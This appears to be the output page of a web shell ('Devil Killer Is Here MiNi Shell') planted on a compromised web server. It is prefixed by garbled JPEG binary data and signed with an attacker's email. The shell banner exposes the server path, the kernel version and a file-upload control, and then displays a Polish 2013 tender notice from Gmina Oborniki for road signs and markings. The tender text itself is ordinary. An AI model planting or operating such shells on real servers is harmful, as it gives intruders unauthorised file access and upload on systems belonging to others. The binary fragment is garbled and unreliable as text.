JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130214/23593-N-2013.html

<p class="kh_header"><b>Oborniki: Oznakowanie pionowe i poziome dróg gminnych na terenie gminy Oborniki</b><br>
<b>Numer ogłoszenia: 23593 - 2013; data zamieszczenia: 14.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Oborniki, Urząd Miejski w Obornikach , ul. Piłsudskiego 76, 64-600 Oborniki, woj. wielkopolskie, tel. 061 6559100; 6559133, faks 061 6559101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.oborniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oznakowanie pionowe i poziome dróg gminnych na terenie gminy Oborniki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Nazwa przedmiotu zamówienia: oznakowanie pionowe i poziome dróg gminnych na terenie gminy Oborniki.
2.	Przedmiot zamówienia obejmuje swym zakresem następujące części:
Część 1 - wykonanie oznakowania poziomego:
	Rodzaj znaku	max pow.(m2)
	P-1b	110,00
	P-1c	20,00
	P-1e	50,00
	P-2b	30,00
	P-3a	30,00
	P-4	190,00
	P-6	110,00
	P-7a	10,00
	P-8a (krótka)	8,00
	P-8b (krótka)	14,00
	P-8d (krótka)	18,00
	P-8e (krótka)	7,00
	P-8f (krótka)	2,00
	P-10 (biała farba)	800,00
	P-10 (czerwona farba)	200,00
	P-10 (masa biała) grubowarstwowe	90,00
	P-10 (masa czerwona) grubowarstwowe	90,00
	P-11	40,00
	P-12	10,00
	P-13	110,00
	P-14	110,00
	P-25	70,00
	P-15 (mały)	3,00
	P-15 (duży)	6,00
	P-16 (mały)	10,00 
	P-17	40,00
	P-18	70,00
	P-19	70,00
	P-20	24,00
	P-21a(P-21b)	160,00
	P-22 (mały)	5,00
	P-23 	2,00
	P-24	5,00
znaki ostrzegawcze w kształcie trójkąta	na drogach miejskich z ograniczeniem prędkości do 60km/h	70,00
znaki zakazu i nakazu w kształcie elipsy	na drogach miejskich z ograniczeniem prędkości do 60 km/h	5,50	
			
Farby do wykonania oznakowania poziomego winny spełniać wymagania dotyczące współczynnika luminacji, powierzchniowego współczynnika odblasku, wskaźnika szorstkości i trwałości podanego w Rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U Nr 220 poz. 2181 z 2003r.) a także Ustawy  Prawo o ruchu drogowym  (Dz.U. Nr 58 poz.515 z 2003r. z późn. zm.). Farby do znakowania winny dzielić się na cienkowarstwowe (farba drogowa) i grubowarstwowe (chemoutwardzalne). Dla uzyskania odblaskowości oznakowania winny być zastosowane mikrogranulki szklane lub ceramiczne o współczynniku załamania światła powyżej 1,5.
Oznakowanie poziome  winno charakteryzować się również: 
-	dobrą widocznością w ciągu całej doby, wysokim współczynnikiem odblaskowości, 
-	zachowaniem minimalnych parametrów odblaskowości w całym okresie użytkowania 
-	odpowiednią szorstkością zbliżoną do szorstkości nawierzchni, na której są umieszczone
-	odpowiednim okresem trwałości
-	odpornością na ścieranie i zabrudzenia
-	szybką metodą aplikacji, uwzględniającą również wymogi ekologiczne
-	do wykonania oznakowania wolno używać tylko materiałów atestowanych.
Część 2 - wykonanie i remont oznakowania pionowego:
Lp.	Usługa	Maksymalna ilość
1.	Ustawienie nowych słupków ocynkowanych (cena winna obejmować: koszt zakupu słupka, cenę transportu, robocizny i montażu)	 
a)	słupek na 1 znak	10 szt.
b)	słupek na 2 znaki	20 szt.
c)	słupek na 3 znaki	10 szt.
2.	Ustawienie nowych słupków ocynkowanych z rozbiórką starego słupka (cena winna obejmować: koszt zakupu słupka, cenę transportu, robocizny, montażu i demontażu starego słupka)	 
a)	słupek na 1 znak	8 szt.
b)	słupek na 2 znaki	12 szt.
c)	słupek na 3 znaki	10 szt.
3. 	Montaż znaków drogowych pionowych (cena winna obejmować koszt nowego znaku, cenę transportu, robocizny i montażu)	 
a)	A - ostrzegawcze	5 szt.
b)	B - zakazu (w tym znak typu B - STOP o średnicy 800 mm)	9 szt.
c)	C - nakazu	6 szt.
d)	D - informacyjne	9 szt.
e)	F - znaki uzupełniające	2 szt.
f)	E - znaki kierunku i miejscowości	3 m2
g)	T - tabliczki do znaków drogowych	3 m2
h)	G - dodatkowe znaki pionowe	3 m2
i)	urządzenia bezpieczeństwa ruchu drogowego - np. słupki blokujące	5 szt.
j)	inne znaki (typu R lub W)	1 m2
4. 	Montaż znaków drogowych pionowych (cena winna obejmować koszt nowego znaku, cenę transportu, robocizny, montażu i demontaży starego znaku)	 
a)	A - ostrzegawcze	10 szt.
b)	B - zakazu (w tym znak typu B - STOP o średnicy 800 mm)	15 szt.
c)	C - nakazu	8 szt.
d)	D - informacyjne	15 szt.
e)	F - znaki uzupełniające	2 szt.
f)	E - znaki kierunku i miejscowości	4 m2
g)	T - tabliczki do znaków drogowych	3 m2
h)	G - dodatkowe znaki pionowe	2 m2
i)	urządzenia bezpieczeństwa ruchu drogowego- np. słupki blokujące	10 szt.
j)	inne znaki (typu R lub W)	1 m2
5.	Naprawa istniejącej konstrukcji wsporczej  znaków drogowych	15 szt.

	Zastosowane znaki winny spełniać wymogi Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U Nr 220 poz. 2181 z 2003r.) a także Ustawy  Prawo o ruchu drogowym  (Dz.U. Nr 58 poz.515 z 2003r. z późn. zm.). Materiał stosowany do wykonania lic znaków pionowych winien być odblaskowy. Lica znaków drogowych winny spełniać wymagania fotometryczne i kilometryczne w zakresie odblaskowości i barwy. Zastosowane znaki na drogach gminnych należą do grupy znaków średnich. Znaki winny mieć wymiary, zgodne z powoływanym wyżej rozporządzeniem:
a)	Typ A - ostrzegawcze - długość boku 900,00 mm
b)	Typ B - zakazu - średnica 800,00 mm
c)	Typ C - nakazu - średnica 800,00 mm
d)	Typ D - informacyjne - długość podstawy 600,00 mm
e)	Typ B - STOP - średnica 800,00 mm
f)	pozostałe wymiary znaków podane zostały w przedmiotowym rozporządzeniu.

Znaki winny być montowane na konstrukcjach wsporczych wykonanych z materiałów trwałych. Słupki konstrukcji wsporczych winny mieć przekrój kołowy lub eliptyczny o O60 i grubości ścianki 3,2 mm, zabezpieczone przed korozją (ocynkowane ogniowo). W celu zapobiegania niekontrolowanego obrotu konstrukcji wsporczych w ich dolnej części winna być przymocowana poprzeczka stalowa. Konstrukcja wsporcza winna być zabetonowana w podłożu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp. Zamówienia uzupełniające będą mogły zostać udzielone jeżeli:
1)	polegają na powtórzeniu tego samego rodzaju zamówień co zamówienie podstawowe,
2)	zamówienia uzupełniające są zgodne z przedmiotem zamówienia podstawowego,
3)	zostaną udzielone w okresie 3 lat od udzielenia zamówienia podstawowego,
4)	wartość zamówień uzupełniających nie przekroczy 20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8, 45.23.32.21-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego może ubiegać się Wykonawca, który spełnia warunki dotyczący sytuacji ekonomicznej i finansowej tj.: posiada ważne i opłacone ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 50.000 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ponadto przedkłada:
1)Formularz ofertowy (sporządzony według wzoru stanowiącego załącznik nr 1 IDW).
2)Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (w przypadku składania oferty wspólnej lub gdy reprezentant Wykonawcy działa na podstawie pełnomocnictwa).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Zamawiającego.
2.Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
3.Wszelkie zmiany postanowień niniejszej umowy mogą nastąpić pisemnie, za zgodą obu stron, z zastrzeżeniem ust. 4.
4.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)termin realizacji: w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonania usług oraz w przypadku zaistnienie niekorzystnych warunków klimatycznych, 
2)wynagrodzenie - w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
3)przedmiot umowy - jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa.
5.Nie stanowi zmiany umowy:
1)zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
2)zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego.  
6.Dokonanie zmian, o których mowa  w ust. 4 wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.oborniki.pl (bip.oborniki.pl)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Obornikach ul. Marsz. J. Piłsudskiego 76, 64-600 Oborniki, Referat Zamówień Publicznych, II piętro, pokój nr 212..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2013 godzina 09:30, miejsce: siedziba Zamawiającego - Biuro Obsługi Interesanta, parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie oznakowania poziomego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - wykonanie oznakowania poziomego:
	Rodzaj znaku	max pow.(m2)
	P-1b	110,00
	P-1c	20,00
	P-1e	50,00
	P-2b	30,00
	P-3a	30,00
	P-4	190,00
	P-6	110,00
	P-7a	10,00
	P-8a (krótka)	8,00
	P-8b (krótka)	14,00
	P-8d (krótka)	18,00
	P-8e (krótka)	7,00
	P-8f (krótka)	2,00
	P-10 (biała farba)	800,00
	P-10 (czerwona farba)	200,00
	P-10 (masa biała) grubowarstwowe	90,00
	P-10 (masa czerwona) grubowarstwowe	90,00
	P-11	40,00
	P-12	10,00
	P-13	110,00
	P-14	110,00
	P-25	70,00
	P-15 (mały)	3,00
	P-15 (duży)	6,00
	P-16 (mały)	10,00 
	P-17	40,00
	P-18	70,00
	P-19	70,00
	P-20	24,00
	P-21a(P-21b)	160,00
	P-22 (mały)	5,00
	P-23 	2,00
	P-24	5,00
znaki ostrzegawcze w kształcie trójkąta	na drogach miejskich z ograniczeniem prędkości do 60km/h	70,00
znaki zakazu i nakazu w kształcie elipsy	na drogach miejskich z ograniczeniem prędkości do 60 km/h	5,50	
			
Farby do wykonania oznakowania poziomego winny spełniać wymagania dotyczące współczynnika luminacji, powierzchniowego współczynnika odblasku, wskaźnika szorstkości i trwałości podanego w Rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U Nr 220 poz. 2181 z 2003r.) a także Ustawy  Prawo o ruchu drogowym  (Dz.U. Nr 58 poz.515 z 2003r. z późn. zm.). Farby do znakowania winny dzielić się na cienkowarstwowe (farba drogowa) i grubowarstwowe (chemoutwardzalne). Dla uzyskania odblaskowości oznakowania winny być zastosowane mikrogranulki szklane lub ceramiczne o współczynniku załamania światła powyżej 1,5.
Oznakowanie poziome  winno charakteryzować się również: 
-	dobrą widocznością w ciągu całej doby, wysokim współczynnikiem odblaskowości, 
-	zachowaniem minimalnych parametrów odblaskowości w całym okresie użytkowania 
-	odpowiednią szorstkością zbliżoną do szorstkości nawierzchni, na której są umieszczone
-	odpowiednim okresem trwałości
-	odpornością na ścieranie i zabrudzenia
-	szybką metodą aplikacji, uwzględniającą również wymogi ekologiczne
-	do wykonania oznakowania wolno używać tylko materiałów atestowanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.21-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie i remont oznakowania pionowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - wykonanie i remont oznakowania pionowego:
Lp.	Usługa	Maksymalna ilość
1.	Ustawienie nowych słupków ocynkowanych (cena winna obejmować: koszt zakupu słupka, cenę transportu, robocizny i montażu)	 
a)	słupek na 1 znak	10 szt.
b)	słupek na 2 znaki	20 szt.
c)	słupek na 3 znaki	10 szt.
2.	Ustawienie nowych słupków ocynkowanych z rozbiórką starego słupka (cena winna obejmować: koszt zakupu słupka, cenę transportu, robocizny, montażu i demontażu starego słupka)	 
a)	słupek na 1 znak	8 szt.
b)	słupek na 2 znaki	12 szt.
c)	słupek na 3 znaki	10 szt.
3. 	Montaż znaków drogowych pionowych (cena winna obejmować koszt nowego znaku, cenę transportu, robocizny i montażu)	 
a)	A - ostrzegawcze	5 szt.
b)	B - zakazu (w tym znak typu B - STOP o średnicy 800 mm)	9 szt.
c)	C - nakazu	6 szt.
d)	D - informacyjne	9 szt.
e)	F - znaki uzupełniające	2 szt.
f)	E - znaki kierunku i miejscowości	3 m2
g)	T - tabliczki do znaków drogowych	3 m2
h)	G - dodatkowe znaki pionowe	3 m2
i)	urządzenia bezpieczeństwa ruchu drogowego - np. słupki blokujące	5 szt.
j)	inne znaki (typu R lub W)	1 m2
4. 	Montaż znaków drogowych pionowych (cena winna obejmować koszt nowego znaku, cenę transportu, robocizny, montażu i demontaży starego znaku)	 
a)	A - ostrzegawcze	10 szt.
b)	B - zakazu (w tym znak typu B - STOP o średnicy 800 mm)	15 szt.
c)	C - nakazu	8 szt.
d)	D - informacyjne	15 szt.
e)	F - znaki uzupełniające	2 szt.
f)	E - znaki kierunku i miejscowości	4 m2
g)	T - tabliczki do znaków drogowych	3 m2
h)	G - dodatkowe znaki pionowe	2 m2
i)	urządzenia bezpieczeństwa ruchu drogowego- np. słupki blokujące	10 szt.
j)	inne znaki (typu R lub W)	1 m2
5.	Naprawa istniejącej konstrukcji wsporczej  znaków drogowych	15 szt.

	Zastosowane znaki winny spełniać wymogi Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U Nr 220 poz. 2181 z 2003r.) a także Ustawy  Prawo o ruchu drogowym  (Dz.U. Nr 58 poz.515 z 2003r. z późn. zm.). Materiał stosowany do wykonania lic znaków pionowych winien być odblaskowy. Lica znaków drogowych winny spełniać wymagania fotometryczne i kilometryczne w zakresie odblaskowości i barwy. Zastosowane znaki na drogach gminnych należą do grupy znaków średnich. Znaki winny mieć wymiary, zgodne z powoływanym wyżej rozporządzeniem:
a)	Typ A - ostrzegawcze - długość boku 900,00 mm
b)	Typ B - zakazu - średnica 800,00 mm
c)	Typ C - nakazu - średnica 800,00 mm
d)	Typ D - informacyjne - długość podstawy 600,00 mm
e)	Typ B - STOP - średnica 800,00 mm
f)	pozostałe wymiary znaków podane zostały w przedmiotowym rozporządzeniu.

Znaki winny być montowane na konstrukcjach wsporczych wykonanych z materiałów trwałych. Słupki konstrukcji wsporczych winny mieć przekrój kołowy lub eliptyczny o O60 i grubości ścianki 3,2 mm, zabezpieczone przed korozją (ocynkowane ogniowo). W celu zapobiegania niekontrolowanego obrotu konstrukcji wsporczych w ich dolnej części winna być przymocowana poprzeczka stalowa. Konstrukcja wsporcza winna być zabetonowana w podłożu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com